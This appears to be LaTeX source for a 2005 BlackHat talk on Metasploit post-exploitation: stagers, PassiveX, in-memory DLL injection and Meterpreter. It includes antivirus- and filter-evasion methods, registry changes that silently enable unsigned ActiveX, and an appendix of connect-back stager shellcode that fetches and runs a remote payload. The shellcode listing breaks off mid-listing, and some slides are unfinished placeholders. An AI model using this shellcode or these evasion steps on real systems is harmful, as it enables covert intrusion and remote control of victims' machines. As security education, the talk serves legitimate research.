1149 lines
34 KiB
TeX
1149 lines
34 KiB
TeX
\documentclass{beamer}
|
|
\usepackage{graphicx}
|
|
\usepackage{color}
|
|
|
|
\mode<presentation> { }
|
|
|
|
\usepackage[english]{babel}
|
|
\usepackage[latin1]{inputenc}
|
|
\usepackage{times}
|
|
\usepackage[T1]{fontenc}
|
|
% I think this looks cool, but whateva! - skape
|
|
%\usepackage{beamerthemeshadow}
|
|
|
|
% Love from spoon
|
|
\newcommand{\pdfpart}[1]{\label{pdfpart-#1}\pdfbookmark[0]{#1}{pdfpart-#1}\part{#1}}
|
|
\newenvironment{sitemize}{\vspace{1mm}\begin{itemize}\itemsep 4pt\small}{\end{itemize}}
|
|
\newenvironment{senumerate}{\vspace{1mm}\begin{enumerate}\itemsep 4pt\small}{\end{enumerate}}
|
|
|
|
% Presentation meta-information
|
|
\title{Beyond EIP}
|
|
\author[spoonm \& skape] {spoonm \& skape}
|
|
\date[BlackHat 2005] {BlackHat, 2005}
|
|
\subject{Beyond EIP}
|
|
|
|
% Add a spacer between each part
|
|
\AtBeginPart{\frame{\partpage}}
|
|
|
|
% Turn off the navigation on the bottom yo
|
|
\setbeamertemplate{navigation symbols}{}
|
|
% spoon hates berkeley!
|
|
%\usetheme[width=2.2cm]{Berkeley}
|
|
%\usecolortheme{sidebartab}
|
|
|
|
\begin{document}
|
|
|
|
\begin{frame}[t]
|
|
\titlepage
|
|
\end{frame}
|
|
|
|
\pdfpart{Introduction}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Who are we?}
|
|
|
|
\begin{sitemize}
|
|
\item spoonm
|
|
\begin{sitemize}
|
|
\item Full-time student
|
|
\item Metasploit developer since late 2003
|
|
\end{sitemize}
|
|
|
|
\item skape
|
|
\begin{sitemize}
|
|
\item Lead software developer by day
|
|
\item Independent security researcher by night
|
|
\item Joined the Metasploit project in 2004
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{What's this presentation about?}
|
|
\begin{sitemize}
|
|
\item What it's not about
|
|
\begin{sitemize}
|
|
\item New exploit / attack vectors
|
|
\item New exploitation techniques
|
|
\item Oday, bugs, etc
|
|
\end{sitemize}
|
|
\pause
|
|
\item What it is about
|
|
\begin{sitemize}
|
|
\item Cools stuff to down after owning EIP
|
|
\item The techniques to do it
|
|
\item Our tools to support it
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Plan of attack}
|
|
\begin{sitemize}
|
|
\item Shellcode infrastructure
|
|
\begin{sitemize}
|
|
\item How it works / Background
|
|
\item Recent tools, tricks, and techniques
|
|
\end{sitemize}
|
|
\item Post-exploitation tools
|
|
\begin{sitemize}
|
|
\item Introduction, previous tools
|
|
\item The technology behind ours tools
|
|
\item Applications to evasion and anti-forensics
|
|
\item Crazy cool features for the end-user
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Our definitions: the exploitation cycle}
|
|
|
|
\begin{sitemize}
|
|
\item \textbf{Pre-exploitation} - Before the attack
|
|
\begin{sitemize}
|
|
\item Find a bug and locate the code
|
|
\item Write the exploit
|
|
\item Write any other tools, shellcode, etc
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item \textbf{Exploitation} - Leveraging the vulnerability
|
|
\begin{sitemize}
|
|
\item Do some recon, gather information
|
|
\item Find a vulnerable target
|
|
\item Get network access to vulnerable target, etc
|
|
\item Initialize tools, infrastructure, etc
|
|
\item Launch the exploit
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item \textbf{Post-exploitation} - Manipulating the target
|
|
\begin{sitemize}
|
|
% NOTE:
|
|
\item Not so much the command shell itself, but what you do with it
|
|
\item Command shell redirection
|
|
\item Arbitrary command execution
|
|
\item Advanced payload interaction
|
|
\item File access, VNC, pivoting, etc
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\pdfpart{Payload Infrastructure}
|
|
|
|
\section{Introduction}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Anatomy of a Payload}
|
|
\begin{sitemize}
|
|
\item Nop sled
|
|
\item For exploits where return is uncertain
|
|
\item Control flows through the sled into the encoder
|
|
\item Generally 1 byte aligned for x86
|
|
\item Not very common for win32 exploits
|
|
\item Encoder (aka Decoder)
|
|
\item loops and decodes payload
|
|
\item payload executed when finished
|
|
\item Payload
|
|
\item do something cool here
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
|
|
\section{Pre-exploitation}
|
|
\begin{frame}[t]
|
|
\frametitle{Payload encoders}
|
|
|
|
\begin{sitemize}
|
|
\item Robust and elegant encoders do exist
|
|
\begin{sitemize}
|
|
\item SkyLined's Alpha2 x86 alphanumeric encoder
|
|
\item Spoonm's high-permutation Shikata Ga Nai
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Payload encoders generally taken for granted
|
|
\begin{sitemize}
|
|
\item Most encoders use a static decoder stub
|
|
\item Makes NIDS signatures easy to write
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{NOP generators}
|
|
|
|
\begin{sitemize}
|
|
\item NOP generation hasn't publicly changed much
|
|
\begin{sitemize}
|
|
\item Most PoC exploits use predictable single-byte NOPs (\texttt{0x90}), if any
|
|
\item ADMmutate's NOP generator easily signatured by NIDS (Snort, Fnord)
|
|
\item Not considered an important research topic to most
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Still, NIDS continues to play chase the tail
|
|
\begin{sitemize}
|
|
\item The mouse always has the advantage; NIDS is reactive
|
|
\item Advanced NOP generators and encoders push NIDS to its limits
|
|
\item Many protocols can be complex to signature (DCERPC fragmentation)
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Metasploit 2.4 released with a wide-distribution
|
|
multi-byte x86 NOP generator (Opty2)
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\section{Exploitation}
|
|
\begin{frame}[t]
|
|
\frametitle{Exploitation techniques}
|
|
|
|
\begin{sitemize}
|
|
\item Exploitation techniques have become very mature
|
|
\begin{sitemize}
|
|
\item Linux/BSD/Solaris techniques are largely unchanged
|
|
\item Windows heap overflows can be made more reliable (Oded/Shok)
|
|
\item Windows SEH overwrites make exploitation easy, even on XPSP2
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Exploitation vectors have been beaten to death
|
|
\pause
|
|
\item ...so we wont be talking about them
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\section{Post-exploitation}
|
|
\begin{frame}[t]
|
|
\frametitle{Standard payloads}
|
|
|
|
\begin{sitemize}
|
|
\item Standard payloads provide the most basic manipulation
|
|
of a target
|
|
\begin{sitemize}
|
|
\item Port-bind command shell
|
|
\item Reverse (connectback) command shell
|
|
\item Arbitrary command execution
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Nearly all PoC exploits use standard payloads
|
|
|
|
\pause
|
|
\item Command shells have poor automation support
|
|
\begin{sitemize}
|
|
\item Platform dependent intrinsic commands and
|
|
scripting
|
|
\item Reliant on the set of applications installed on the
|
|
machine
|
|
\item Hindered by chroot jails and host-based ACLs
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{``Advantage'' payloads}
|
|
|
|
\begin{sitemize}
|
|
\item Advantage payloads provide enhanced manipulation of
|
|
hosts, commonly through the native API
|
|
\item Help to reduce the tediousness of writing payloads
|
|
|
|
\item Core ST's InlineEgg
|
|
|
|
% TODO: Elaborate on InlineEgg
|
|
% TODO: others...
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\pdfpart{Payload Stagers}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{What are payload stagers?}
|
|
|
|
\begin{sitemize}
|
|
\item Payload stagers are small stubs that load and execute other
|
|
payloads
|
|
\item The payloads that are executed are known as stages
|
|
\item Stages perform arbitrary tasks, such as spawning a
|
|
shell
|
|
|
|
\pause
|
|
\item Stagers are typically network based and follow three
|
|
basic steps
|
|
\begin{sitemize}
|
|
\item Establish connection to attacker (reverse,
|
|
portbind, findsock)
|
|
\item Read in a payload from the connection
|
|
\item Execute a payload with the connection in known a register
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item The three steps make it so stages are connection method
|
|
independent
|
|
\begin{sitemize}
|
|
\item No need to have command shell payloads for
|
|
reverse, portbind, and findsock
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Why are payload stagers useful?}
|
|
|
|
\begin{sitemize}
|
|
\item Some vulnerabilities have limited space for the
|
|
initial payload
|
|
|
|
\pause
|
|
\item Typically much smaller than the stages
|
|
they execute
|
|
|
|
\pause
|
|
\item Eliminate the need to re-implement payloads for each
|
|
connection method
|
|
|
|
\pause
|
|
\item Provide an abstract way for getting arbitrary code
|
|
onto a remote machine through any medium
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\section{Windows Ordinal Stagers}
|
|
|
|
\subsection{Overview}
|
|
\begin{frame}[t]
|
|
\frametitle{Windows ordinal stagers}
|
|
|
|
\begin{sitemize}
|
|
\item Technique from Oded's lightning talk at core04
|
|
\item Uses static ordinals in \texttt{WS2\_32.DLL} to locate symbol
|
|
addresses
|
|
\item Compatible with all versions of Windows (including 9X)
|
|
\item Results in very low-overhead symbol resolution
|
|
\item Facilitates implementation of reverse, portbind, and
|
|
findsock stagers
|
|
\item Leads to very tiny win32 stagers (92 byte reverse, 93
|
|
byte findsock)
|
|
\item Detailed write-up can be found in reference materials
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{How ordinal stagers work}
|
|
|
|
\begin{sitemize}
|
|
\item Ordinals are unique numbers that identify exported
|
|
symbols in PE files
|
|
\item Each ordinal can be used to resolve the address of an
|
|
exported symbol
|
|
|
|
\pause
|
|
\item Most of the time, ordinals are incremented linearly by the
|
|
linker
|
|
\item Sometimes, however, developers may wish to force
|
|
symbols to use the same ordinal every build
|
|
\item When ordinals are the same every build, they are
|
|
referred to as static
|
|
|
|
\pause
|
|
\item Using an image's exports by ordinal instead of by name
|
|
is more efficient at runtime
|
|
\item However, it will not be reliably portable unless the
|
|
ordinals are known-static
|
|
|
|
\pause
|
|
\item Very few PE files use known-static ordinals, but
|
|
\texttt{WS2\_32.DLL} is one that does
|
|
\begin{sitemize}
|
|
\item 30 symbols use static ordinals in
|
|
\texttt{WS2\_32.DLL}
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{Implementation}
|
|
\begin{frame}[t]
|
|
\frametitle{Implementing a reverse ordinal stager}
|
|
|
|
\begin{sitemize}
|
|
\item Locate the base address of \texttt{WS2\_32.DLL}
|
|
\begin{sitemize}
|
|
\item Extract the Peb->Ldr pointer
|
|
\item Extract Flink from the InInitOrderModuleList
|
|
\item Loop through loaded modules comparing module names
|
|
\item Module name is stored in unicode, but can be
|
|
partially translated to ANSI
|
|
\item Once \texttt{WS2\_32.DLL} is found, extract its
|
|
BaseAddress
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Resolve \texttt{socket}, \texttt{connect},
|
|
and \texttt{recv}
|
|
\begin{sitemize}
|
|
\item Use static ordinals to index the Export Directory Address Table
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Allocate a socket, connect to the attacker,
|
|
and read in the next payload
|
|
|
|
\pause
|
|
\item Requires that \texttt{WS2\_32.DLL} already be loaded
|
|
in the target process
|
|
\end{sitemize}
|
|
|
|
\end{frame}
|
|
|
|
\section{PassiveX}
|
|
\subsection{Overview}
|
|
\begin{frame}[t]
|
|
\frametitle{PassiveX}
|
|
|
|
\begin{sitemize}
|
|
\item Robust payload stager capable of bypassing restrictive
|
|
outbound filters
|
|
\item Compatible with Windows 2000+ running Internet
|
|
Explorer 6.0+
|
|
\item Uses HTTP to communicate with attacker
|
|
\item Provides an alternate vector for library injection via
|
|
ActiveX
|
|
\item Detailed write-up can be found in reference materials
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{How PassiveX works}
|
|
|
|
\begin{sitemize}
|
|
\item Enables support for both signed and unsigned ActiveX
|
|
controls in the \texttt{Internet} zone.
|
|
\begin{sitemize}
|
|
\pause
|
|
\item Necessary because administrators may have disabled
|
|
ActiveX support for security reasons
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Launches a hidden instance of Internet Explorer
|
|
|
|
\pause
|
|
\item Internet Explorer loads a page that the attacker
|
|
has put an embedded ActiveX control on
|
|
|
|
\pause
|
|
\item Internet Explorer loads and executes the ActiveX
|
|
control
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Why is PassiveX useful?}
|
|
|
|
\begin{sitemize}
|
|
\item Relatively small (roughly 400 byte) stager that does not
|
|
directly interact with the network
|
|
|
|
\pause
|
|
\item Bypasses common outbound filters by tunneling through
|
|
HTTP
|
|
|
|
\pause
|
|
\item Automatically uses proxy settings defined in Internet
|
|
Explorer
|
|
|
|
\pause
|
|
\item Bypasses trusted application restrictions (ZoneAlarm)
|
|
|
|
\pause
|
|
\item ActiveX technology allows the attacker to implement
|
|
complex code in higher level languages (C, C++, VB)
|
|
\begin{sitemize}
|
|
\item Eliminates the need to perform complicated tasks
|
|
from assembly
|
|
\item ActiveX controls are functionally equivalent to
|
|
executables
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{Implementation}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Implementing the PassiveX stager}
|
|
|
|
\begin{sitemize}
|
|
\item Enable download and execution of ActiveX controls
|
|
\begin{sitemize}
|
|
\item Open the current user's \texttt{Internet} zone
|
|
registry key
|
|
\item Enable four settings
|
|
\begin{sitemize}
|
|
\item \texttt{Download signed ActiveX controls}
|
|
\item \texttt{Download unsigned ActiveX controls}
|
|
\item \texttt{Run ActiveX controls and plugins}
|
|
\item \texttt{Initialize and script ActiveX controls not
|
|
marked as safe}
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Launch a hidden instance of Internet Explorer pointed
|
|
at a URL the attacker controls
|
|
|
|
\pause
|
|
\item Internet Explorer then loads and executes the attacker's
|
|
ActiveX control
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{Example ActiveX: HTTP Tunneling Control}
|
|
\begin{frame}[t]
|
|
\frametitle{An example ActiveX control}
|
|
|
|
\begin{sitemize}
|
|
\item ActiveX controls may choose to build an HTTP tunnel
|
|
to the attacker
|
|
\item HTTP tunnels provide a streaming connection over HTTP
|
|
requests and responses
|
|
\item Useful for tunneling other protocols, like TCP,
|
|
through HTTP
|
|
|
|
% TODO: elaborate?
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{Pros \& Cons}
|
|
\begin{frame}[t]
|
|
\frametitle{Pros \& cons}
|
|
|
|
\begin{sitemize}
|
|
\item \textbf{Pros}
|
|
\begin{sitemize}
|
|
\item Bypasses restrictive outbound filters at both a
|
|
network and application level
|
|
|
|
\pause
|
|
\item Provides a method for using complex code written
|
|
in a high-level language
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item \textbf{Cons}
|
|
\begin{sitemize}
|
|
\item Does not work when run as a non-privileged user
|
|
\begin{sitemize}
|
|
\item Internet Explorer refuses to download ActiveX
|
|
controls
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Requires the ActiveX control to restore
|
|
\texttt{Internet} zone settings
|
|
\begin{sitemize}
|
|
\item May leave the machine vulnerable to compromise
|
|
if not done
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\pdfpart{Payload Stages}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{What are payload stages?}
|
|
|
|
\begin{sitemize}
|
|
\item Payload stages are executed by payload stagers and
|
|
perform arbitrary tasks
|
|
|
|
\pause
|
|
\item Some examples of payload stages include
|
|
\begin{sitemize}
|
|
\item Execute a command shell and redirect IO to the
|
|
attacker
|
|
\item Execute an arbitrary command
|
|
\item Download an executable from a URL and execute it
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Why are payload stages useful?}
|
|
|
|
\begin{sitemize}
|
|
\item Can be executed independent of connection method
|
|
(portbind, reverse)
|
|
\begin{sitemize}
|
|
\item All stagers store the connection file descriptor
|
|
in a common register
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Not subject to size limitations of individual
|
|
vulnerabilities
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\section{Library Injection}
|
|
|
|
\subsection{Overview}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{The library injection stage}
|
|
|
|
\begin{sitemize}
|
|
\item Payload stage that provides a method of loading a
|
|
library (DLL) into the exploited process
|
|
|
|
\pause
|
|
\item Libraries are functionally equivalent to executables
|
|
\begin{sitemize}
|
|
\item Full access to various OS-provided APIs
|
|
\item Can do anything an executable can do
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Library injection is covert; no new processes
|
|
need to be created
|
|
|
|
\pause
|
|
\item Detailed write-up can be found in reference materials
|
|
|
|
% TODO: elaborate?
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Types of library injection}
|
|
|
|
\begin{sitemize}
|
|
\item Three primary methods exist to inject a library
|
|
\begin{senumerate}
|
|
\item \textbf{On-Disk}: loading a library from the target's
|
|
harddrive or a file share
|
|
\item \textbf{In-Memory}: loading a library entirely from memory
|
|
\item \textbf{ActiveX}: loading a library through Internet
|
|
Explorer's ActiveX support
|
|
\end{senumerate}
|
|
\item On-Disk and In-Memory techniques are conceptually
|
|
portable to non-Windows platforms
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{On-Disk library injection}
|
|
|
|
\begin{sitemize}
|
|
\item Loading a library from disk has been the defacto
|
|
standard for Windows payloads
|
|
\item Loading a library from a file share was first
|
|
discussed by Brett Moore
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\begin{sitemize}
|
|
\item On-Disk injection subject to filtering by Antivirus due to
|
|
filesystem access
|
|
\item Requires that the library file exist on the target's
|
|
harddrive or that the file share be reachable
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{In-Memory library injection}
|
|
|
|
\begin{sitemize}
|
|
\item First Windows implementation released with Metasploit 2.2
|
|
|
|
\pause
|
|
\item Libraries are loaded entirely from memory
|
|
|
|
\pause
|
|
\item No disk access means no Antivirus interference
|
|
|
|
\pause
|
|
\item Most stealthy form of library injection thus far
|
|
identified
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{ActiveX library injection}
|
|
|
|
\begin{sitemize}
|
|
\item Uses Internet Explorer's ActiveX support to inject a DLL
|
|
\item Reliant on zone restrictions being set to permit ActiveX
|
|
|
|
\pause
|
|
\item Subject to filtering by Antivirus
|
|
|
|
\pause
|
|
\item Implemented by the PassiveX stager described earlier
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{In-Memory Implementation on Windows}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{In-Memory library injection on Windows}
|
|
|
|
\begin{sitemize}
|
|
\item Library loading on Windows is provided through \texttt{NTDLL.DLL}
|
|
\item \texttt{NTDLL.DLL} only supports loading libraries from disk
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\begin{sitemize}
|
|
\item To load libraries from memory, \texttt{NTDLL.DLL} must be tricked
|
|
|
|
\pause
|
|
\item When loading libraries, low-level system calls are used to interact with the library on disk
|
|
\begin{sitemize}
|
|
\item \texttt{NtOpenFile}
|
|
\item \texttt{NtCreateSection}
|
|
\item \texttt{NtMapViewOfSection}
|
|
\end{sitemize}
|
|
\item These routines can be hooked to change their behavior to operate against a memory region
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\begin{sitemize}
|
|
\item Once hooked, calling \texttt{LoadLibraryA} with a unique pseudo file name is all that's needed
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{Example DLL: VNC}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Library injection in action: VNC}
|
|
|
|
\begin{sitemize}
|
|
\item VNC is a remote desktop protocol
|
|
\item Very useful for remote administration beyond simple CLIs
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\begin{sitemize}
|
|
\item First demonstrated at BlackHat USA 2004
|
|
|
|
\pause
|
|
\item Metasploit team converted RealVNC to a standalone DLL
|
|
\begin{sitemize}
|
|
\item No non-standard file dependencies
|
|
\item No installation required
|
|
\item Does not make any registry or filesystem changes
|
|
\item Does not listen on a port; uses payload connection as a VNC client
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item By using the generic library loading stage, VNC was simply plugged in
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\begin{sitemize}
|
|
\item Extremely useful when illustrating security weaknesses
|
|
\item Suits understand mouse movement much better than command lines
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\section{Meterpreter}
|
|
|
|
\subsection{Overview}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{The Meterpreter stage}
|
|
|
|
\begin{sitemize}
|
|
\item First released with Metasploit 2.3
|
|
\item Implemented using library injection technology
|
|
|
|
\pause
|
|
\item Uses payload connection for communicating with
|
|
attacker
|
|
\begin{sitemize}
|
|
\item Especially powerful with findsock payloads; no new
|
|
connection established
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\begin{sitemize}
|
|
\item Primary goals are to be...
|
|
\begin{sitemize}
|
|
\item \textbf{Stealthy}: no disk access and no new process by default
|
|
\item \textbf{Powerful}: channelized communication and robust protocol
|
|
\item \textbf{Extensible}: run-time augmentation of features with extensions
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\begin{sitemize}
|
|
\item Detailed write-up can be found in reference materials
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Why is Meterpreter useful?}
|
|
|
|
\begin{sitemize}
|
|
\item Platform independent design
|
|
\begin{sitemize}
|
|
\item Current implementation is Windows specific, but
|
|
concepts are portable
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Standard interface makes it possible to use one client
|
|
to perform common actions on various platforms
|
|
|
|
\begin{sitemize}
|
|
\pause
|
|
\item Execute a command interpreter and channelize the
|
|
output
|
|
|
|
\pause
|
|
\item Turn on the target's USB webcam and begin
|
|
streaming video
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Programmatically automatable
|
|
\begin{sitemize}
|
|
\item RPC-like protocol allows arbitrarily complex tasks
|
|
to be performed with a common interface
|
|
\item Extension-based architecture makes Meterpreter
|
|
completely flexible
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Use of in-memory library injection makes it possible
|
|
to run in a stealth fashion
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{Implementation}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Architecture - design goals}
|
|
|
|
\begin{sitemize}
|
|
\item Very flexible protocol; should adapt to extension
|
|
requirements without modification
|
|
|
|
\pause
|
|
\item Should expose a channelized communication system for
|
|
extensions
|
|
|
|
\pause
|
|
\item Should be as stealthy as possible
|
|
|
|
\pause
|
|
\item Should be portable to various platforms
|
|
|
|
\pause
|
|
\item Clients on one platform should work with servers on
|
|
another
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Architecture - protocol}
|
|
|
|
\begin{sitemize}
|
|
\item Uses TLV (\texttt{Type-Length-Value}) to support
|
|
opaque data
|
|
|
|
\pause
|
|
\item Every packet is composed of zero or more TLVs
|
|
|
|
\pause
|
|
\item Packets themselves are TLVs
|
|
\begin{sitemize}
|
|
\item Type is the packet type (request, response)
|
|
\item Length is the length of the packet
|
|
\item Value is zero or more embedded TLVs
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item TLVs make packet parsing simplistic and flexible
|
|
\begin{sitemize}
|
|
\item No formatting knowledge is required to parse the
|
|
packet outside of the TLV structure
|
|
\end{sitemize}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Core client/server interface}
|
|
|
|
\begin{sitemize}
|
|
\item Minimal interface to support the loading of extensions
|
|
|
|
\pause
|
|
\item Implements basic packet transmission and dispatching
|
|
\item Exposes channel allocation and management to
|
|
extensions
|
|
|
|
\pause
|
|
\item Also includes support for migrating the server to
|
|
another running process
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\subsection{Example Extension: Stdapi}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Meterpreter extensions in action: Stdapi}
|
|
|
|
\begin{sitemize}
|
|
\item Included in Metasploit 3.0
|
|
\item Combination of previous extensions into standard
|
|
interface
|
|
|
|
\pause
|
|
\item Provides access to standard OS features
|
|
\begin{sitemize}
|
|
\item Process execution, enumeration, and manipulation
|
|
\item Registry manipulation
|
|
\item File reading, writing, uploading, and downloading
|
|
\item Network pivoting
|
|
\item Route table and interface manipulation
|
|
\item \emph{Much} more
|
|
\end{sitemize}
|
|
|
|
\pause
|
|
\item Feature set provides for robust client-side automation
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\section{DispatchNinja}
|
|
\begin{frame}[t]
|
|
\frametitle{Cool dN stuff here}
|
|
\end{frame}
|
|
|
|
\pdfpart{Post-Exploitation Suites}
|
|
|
|
\section{Post-Exploitation Suites}
|
|
\subsection{Motivations \& Goals}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{stuff}
|
|
\end{frame}
|
|
|
|
\pdfpart{Conclusion}
|
|
|
|
\begin{frame}[t]
|
|
\frametitle{Reference Material}
|
|
|
|
\textbf{Payload Stagers}
|
|
\begin{sitemize}
|
|
\item Windows Ordinal Stagers \\
|
|
\footnotesize{\url{http://www.metasploit.com/users/spoonm/ordinals.txt}}
|
|
\item PassiveX \\
|
|
\footnotesize{\url{http://www.uninformed.org/?v=1&a=3&t=sumry}}
|
|
\end{sitemize}
|
|
\textbf{Payload Stages}
|
|
\begin{sitemize}
|
|
\item Library Injection \\
|
|
\footnotesize{\url{http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf}}
|
|
\item Meterpreter \\
|
|
\footnotesize{\url{http://www.nologin.org/Downloads/Papers/meterpreter.pdf}}
|
|
\end{sitemize}
|
|
\end{frame}
|
|
|
|
\appendix
|
|
|
|
\pdfpart{Appendix: Payload Stagers}
|
|
\section{Windows Ordinal Stagers}
|
|
\subsection{Reverse Ordinal Stager Implementation}
|
|
\begin{frame}[fragile]
|
|
\frametitle{Locating WS2\_32.DLL's base address}
|
|
|
|
\footnotesize{
|
|
\begin{verbatim}
|
|
FC cld ; clear direction (lodsd)
|
|
31DB xor ebx,ebx ; zero ebx
|
|
648B4330 mov eax,[fs:ebx+0x30] ; eax = PEB
|
|
8B400C mov eax,[eax+0xc] ; eax = PEB->Ldr
|
|
8B501C mov edx,[eax+0x1c] ; edx = Ldr->InitList.Flink
|
|
8B12 mov edx,[edx] ; edx = LdrModule->Flink
|
|
8B7220 mov esi,[edx+0x20] ; esi = LdrModule->DllName
|
|
AD lodsd ; eax = [esi] ; esi += 4
|
|
AD lodsd ; eax = [esi] ; esi += 4
|
|
4E dec esi ; esi--
|
|
0306 add eax,[esi] ; eax = eax + [esi]
|
|
; (4byte unicode->ANSI)
|
|
3D32335F32 cmp eax,0x325f3332 ; eax == 2_32?
|
|
75EF jnz 0xd ; not equal, continue loop
|
|
|
|
\end{verbatim}
|
|
}
|
|
\end{frame}
|
|
|
|
\begin{frame}[fragile]
|
|
\frametitle{Resolve symbols using static ordinals}
|
|
|
|
\footnotesize{
|
|
\begin{verbatim}
|
|
8B6A08 mov ebp,[edx+0x8] ; ebp = LdrModule->BaseAddr
|
|
8B453C mov eax,[ebp+0x3c] ; eax = DosHdr->e_lfanew
|
|
8B4C0578 mov ecx,[ebp+eax+0x78]; ecx = Export Directory
|
|
8B4C0D1C mov ecx,[ebp+ecx+0x1c]; ecx = Address Table Rva
|
|
01E9 add ecx,ebp ; ecx += ws2base
|
|
8B4158 mov eax,[ecx+0x58] ; eax = socket rva
|
|
01E8 add eax,ebp ; eax += ws2base
|
|
8B713C mov esi,[ecx+0x3c] ; esi = recv rva
|
|
01EE add esi,ebp ; esi += ws2base
|
|
03690C add ebp,[ecx+0xc] ; ebp += connect rva
|
|
\end{verbatim}
|
|
}
|
|
\end{frame}
|
|
|
|
\begin{frame}[fragile]
|
|
\frametitle{Create the socket, connect back, recv, and jump}
|
|
|
|
\footnotesize{
|
|
\begin{verbatim}
|
|
; Use chained call-stacks to save space
|
|
; connect returns to recv returns to buffer (fd in edi)
|
|
53 push ebx ; push 0
|
|
6A01 push byte +0x1 ; push SOCK_STREAM
|
|
6A02 push byte +0x2 ; push AF_INET
|
|
FFD0 call eax ; call socket
|
|
97 xchg eax,edi ; edi = fd
|
|
687F000001 push dword 0x100007f ; push sockaddr_in
|
|
68020010E1 push dword 0xe1100002
|
|
89E1 mov ecx,esp ; ecx = &sockaddr_in
|
|
53 push ebx ; push flags (0)
|
|
